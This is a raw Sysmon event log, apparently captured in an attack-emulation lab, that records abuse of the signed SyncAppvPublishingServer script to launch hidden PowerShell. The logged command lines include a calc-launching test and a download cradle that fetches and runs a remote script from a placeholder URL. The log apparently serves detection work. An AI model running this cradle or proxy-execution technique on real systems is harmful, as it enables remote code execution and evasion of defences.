154100x800000000000000025940497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:38.625{D271FDA4-EA6A-6331-ACE9-020000007402}8184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer \n;Start-Process calc}C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{D271FDA4-EA6A-6331-ABE9-020000007402}7944C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\windows\system32\SyncAppvPublishingServer.vbs" "\n;Start-Process calc"
154100x800000000000000025940395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:38.463{D271FDA4-EA6A-6331-ABE9-020000007402}7944C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\windows\system32\SyncAppvPublishingServer.vbs" "\n;Start-Process calc"C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075{D271FDA4-EA6A-6331-A8E9-020000007402}8092C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\windows\system32\SyncAppvPublishingServer.vbs "\n;Start-Process calc""
154100x800000000000000025940258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:38.303{D271FDA4-EA6A-6331-A9E9-020000007402}7336C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{D271FDA4-EA6A-6331-A8E9-020000007402}8092C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\windows\system32\SyncAppvPublishingServer.vbs "\n;Start-Process calc""
154100x800000000000000025940251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:38.236{D271FDA4-EA6A-6331-A8E9-020000007402}8092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\windows\system32\SyncAppvPublishingServer.vbs "\n;Start-Process calc""C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{D271FDA4-6F52-6323-9002-010000007402}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x800000000000000025938337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:14.022{D271FDA4-EA52-6331-A0E9-020000007402}1964C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075{D271FDA4-6F52-6323-9002-010000007402}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
534500x800000000000000025938259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.574{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exe
10341000x800000000000000025938258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.572{D271FDA4-675B-631B-1600-000000007402}12927080C:\Windows\system32\svchost.exe{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\system32\SyncAppvPublishingServer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000025938257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.572{D271FDA4-675B-631B-1600-000000007402}12921356C:\Windows\system32\svchost.exe{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\system32\SyncAppvPublishingServer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
734700x800000000000000025938256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.572{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid
734700x800000000000000025938255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.568{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid
734700x800000000000000025938254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.568{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValid
734700x800000000000000025938253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.566{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid
734700x800000000000000025938252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.566{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValid
734700x800000000000000025938251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.566{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid
734700x800000000000000025938250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.566{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValid
734700x800000000000000025938249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.565{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValid
734700x800000000000000025938248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.565{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValid
734700x800000000000000025938247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.564{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid
734700x800000000000000025938246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.564{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValid
734700x800000000000000025938245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.564{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5291 (rs1_release.220806-1444)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=F8550606B41FF309D9A1DC76BB4EE875,SHA256=A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EBtrueMicrosoft WindowsValid
734700x800000000000000025938244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.563{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\combase.dll10.0.14393.5192 (rs1_release.220610-1622)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=336FBB55FF4D4E5A05343A51C98A8F74,SHA256=FD42EBCB39DD4311FA7515010FF4D08AC4DFF7D5C35FCB23207833ED4C2E8444trueMicrosoft WindowsValid
734700x800000000000000025938243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.563{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\windows.storage.dll10.0.14393.5291 (rs1_release.220806-1444)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=AA86B65DCB0ECF7263B863DE2A4E8D00,SHA256=2C4E0CA21438A610DCC55E24190146254E959DC5B8A0DE00BE517365CCCB10FBtrueMicrosoft WindowsValid
734700x800000000000000025938242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.563{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid
734700x800000000000000025938241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.563{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid
734700x800000000000000025938240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.557{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\SyncAppvPublishingServer.exe-----MD5=44CBABEF3C52CC1EDFB92BC44E76AC30,SHA256=AAEBFB53FBA563EBC45321D0E7EEBB1F76626C788D86BE9FB7AB91C66F76126AtrueMicrosoft WindowsValid
734700x800000000000000025938235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.562{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\shell32.dll10.0.14393.5291 (rs1_release.220806-1444)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=D73641916AB4964C7FE9B4A37473A01B,SHA256=4BB60581FB93D73CDC4F1FBEA2DDACE5D16FE61B6E0E16622C326B6E2F407A7EtrueMicrosoft WindowsValid
734700x800000000000000025938227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.562{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid
734700x800000000000000025938224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.562{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValid
734700x800000000000000025938217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.561{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid
734700x800000000000000025938212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.561{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid
734700x800000000000000025938211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.561{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid
734700x800000000000000025938210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.560{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\KernelBase.dll10.0.14393.5246 (rs1_release.220701-1744)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=96EFBE3DB6300BB13E0720809302FF9F,SHA256=2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2FtrueMicrosoft WindowsValid
734700x800000000000000025938209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.558{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValid
734700x800000000000000025938207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.557{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValid
10341000x800000000000000025938206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.556{D271FDA4-6B85-631B-7001-000000007402}41006336C:\Windows\system32\csrss.exe{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\system32\SyncAppvPublishingServer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000025938205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.555{D271FDA4-6F52-6323-9002-010000007402}38484420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\system32\SyncAppvPublishingServer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll+383fe6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b50804ab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4503514(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b450314f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4fcb86d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b44c00c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4523b33(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4505b42(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4505b42(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b45059d3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b44f66f3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4503c35(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b45037a7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4503514(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b450314f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4fcb86d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b44e83fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b44e796c(wow64)
154100x800000000000000025938204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:11.548{D271FDA4-EA4F-6331-9FE9-020000007402}7144C:\Windows\System32\SyncAppvPublishingServer.exe-----"C:\Windows\system32\SyncAppvPublishingServer.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=44CBABEF3C52CC1EDFB92BC44E76AC30,SHA256=AAEBFB53FBA563EBC45321D0E7EEBB1F76626C788D86BE9FB7AB91C66F76126A{D271FDA4-6F52-6323-9002-010000007402}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x800000000000000025937753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:07.000{D271FDA4-EA4B-6331-9DE9-020000007402}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX}C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{D271FDA4-EA4A-6331-9CE9-020000007402}5236C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
154100x800000000000000025937677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:06.934{D271FDA4-EA4A-6331-9CE9-020000007402}5236C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075{D271FDA4-6F52-6323-9002-010000007402}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
